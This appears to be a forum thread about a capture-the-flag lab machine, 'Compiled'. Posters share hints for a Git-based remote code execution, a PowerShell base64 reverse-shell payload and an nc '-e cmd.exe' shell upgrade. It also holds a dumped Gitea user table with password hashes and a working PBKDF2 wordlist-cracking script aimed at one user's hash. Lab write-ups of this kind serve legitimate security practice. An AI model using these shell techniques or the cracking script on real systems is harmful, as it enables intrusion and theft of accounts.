[maggi]

yeah

Nice!

how u got it work bro can u explain

Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want

did you get it back on a certain port or smthg, confused as to what im doing wrong here, did manualy and by script

---

I found a file called "pwnd";  its called pwnd so it has to do something somewhere maybe?

Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd

ruycr4ft_was_here

i think someone probably left this, or there was also an rce git exploit that used this 'x was here format' as the payload so maybe someone got one of those working,

could you give me a nudge on shell please 

This is where I shot myself in the foot, I used a bash shell and then a powershell shell underneath as a payload,  it so idk if I am stuck in a mingw64 shell because I was stupid.....
or that's just the way things is?

Try spamming the compile deally with the 2nd repo, it took a bit

[jsvensson]

What payload gives you a shell? I got connection when i try curl in payload but none shell.
Nevermind i got it

[anon912039120]

What payload gives you a shell? I got connection when i try curl in payload but none shell.

i did powershell -e payload and it worked well, you just have to spam the compiler with the 2nd repo as someone mentioned

[UnkownWombat]

Nice!

how u got it work bro can u explain

Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want

did you get it back on a certain port or smthg, confused as to what im doing wrong here, did manualy and by script

---

I found a file called "pwnd";  its called pwnd so it has to do something somewhere maybe?

Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd

ruycr4ft_was_here

i think someone probably left this, or there was also an rce git exploit that used this 'x was here format' as the payload so maybe someone got one of those working,

could you give me a nudge on shell please 

This is where I shot myself in the foot, I used a bash shell and then a powershell shell underneath as a payload,  it so idk if I am stuck in a mingw64 shell because I was stupid.....
or that's just the way things is?

Try spamming the compile deally with the 2nd repo, it took a bit

What payload gives you a shell? I got connection when i try curl in payload but none shell.

i did powershell -e payload and it worked well, you just have to spam the compiler with the 2nd repo as someone mentioned

spamming the :5000 site is definitely the way

also to upgrade shell i curled over a nc binary and did a -e cmd.exe

[7h31nqu1s171v3]

Payload could be a simple "powershell -e base64revshell" ?

yeah

Nice!

how u got it work bro can u explain

Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want

Did the exact same thing, trying to ping or curl first, but it just didnt want to work…

[4rrows]

sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0

---

sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0

Help me crack this guys. Been struggling on this for a while 

What is the path to this db file?

[jsvensson]

Damm password for Emily is joke
U can decrypt it from gitea.db using python script mine got for me chatgpt.

[breachhacks9]

yo, anyone got emily?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Accusing forum user of being a fraudster without making any deal

[jsvensson]

Sure:
import hashlib
import binascii

def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
hash_value = hashlib.pbkdf2_hmac(
'sha256', # hashing algorithm
password.encode('utf-8'), # password
salt, # salt
iterations, # number of iterations
dklen=dklen # key length
)
return hash_value

def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):

target_hash_bytes = binascii.unhexlify(target_hash)


with open(dictionary_file, 'r', encoding='utf-8') as file:
for line in file:

password = line.strip()

# generating hash
hash_value = pbkdf2_hash(password, salt, iterations, dklen)

# Check if hash is correct
if hash_value == target_hash_bytes:
print(f"Found password: {password}")
return password

print("Password not found.")
return None

# Parameters
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486') # Salt from gitea.db
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16' # hash from gitea.db

# Patch to dictionary
dictionary_file = '/usr/share/wordlists/rockyou.txt'

find_matching_password(dictionary_file, target_hash, salt)

[jsvensson]

So now for root. Any hints?